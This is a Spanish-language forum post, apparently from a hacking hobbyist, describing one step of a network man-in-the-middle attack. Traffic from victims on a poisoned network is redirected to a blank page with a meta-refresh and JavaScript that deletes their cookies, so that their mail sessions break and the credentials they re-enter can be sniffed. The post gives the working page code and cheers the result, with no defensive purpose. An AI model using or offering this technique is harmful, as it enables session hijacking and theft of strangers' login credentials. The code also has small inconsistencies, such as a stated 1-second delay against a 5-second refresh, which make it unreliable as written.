Pues hola de nuevo gente,
he estado realizando pruebas y puedo decir que han sido bastante positivas. Alguna pega tiene pero todo es cuestión de ir depurando, aunque tambien puedo decir que no es facil de detectar.
Comienzo por el principio y no me enrrollo...
El principal problema era que a la hora de esnifar datos de la red una vez envenenada era que aquellos clientes que tuviesen iniciada una sesión por ejemplo en su correo de Hotmail no podremos capturar sus datos ya que ya estaban introducidos cuando empezamos a esnifar. ¿Solución?. Hacer que la sesión se pierda. Para ello lo primero es eliminarle las "cookies" a nuestros cliente/s. Simplemente redirigimos todo el tráfico a una página que nosotros mismos creamos "sin contenido visible" a la cual le insertamos los siguientes códigos:
//Para redirigir de nuevo a la página donde se encontraba el cliente
//Le damos 1 seg, tiempo suficiente para que se ejecute el código que me elimina las cookies
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">
//Código en javascript que me elimina las cookies
<body >
<script language="javascript" type="text/javascript">
if (document.cookie != "") {
if (confirm("Eliminar todas las Cookies?")) {
la_cookie = document.cookie.split("; ")
fecha_fin = new Date
fecha_fin.setDate(fecha_fin.getDate()-1)
for (i=0; i<la_cookie.length; i++) {
mi_cookie = la_cookie[i].split("=")[0]
document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString()
}
document.write("Se han eliminado: " + la_cookie.length + " Cookies ")
}
}
</script>
</body>
Y listo. ¿Cual es el resultado?
EL cliente cuando navega en el momento que nosotros empezamos a esnifar la red y por tanto la redirección, cuando haga un click sobre la página que está o intente navegar verá una página en blanco durante 1 seg (igual que cuando navegamos de forma normal al cargar una nueva página) y después volverá a la que se ha solicitado con la salvedad de que se ha ejecutado durante ese segundo un código que le ha roto la sesión. A partir de ahí a divertirse.... !!!!!!
Lógicamente seguiré probando para que todo el proceso sea más invisible pero es el paso funcional que he podido dar.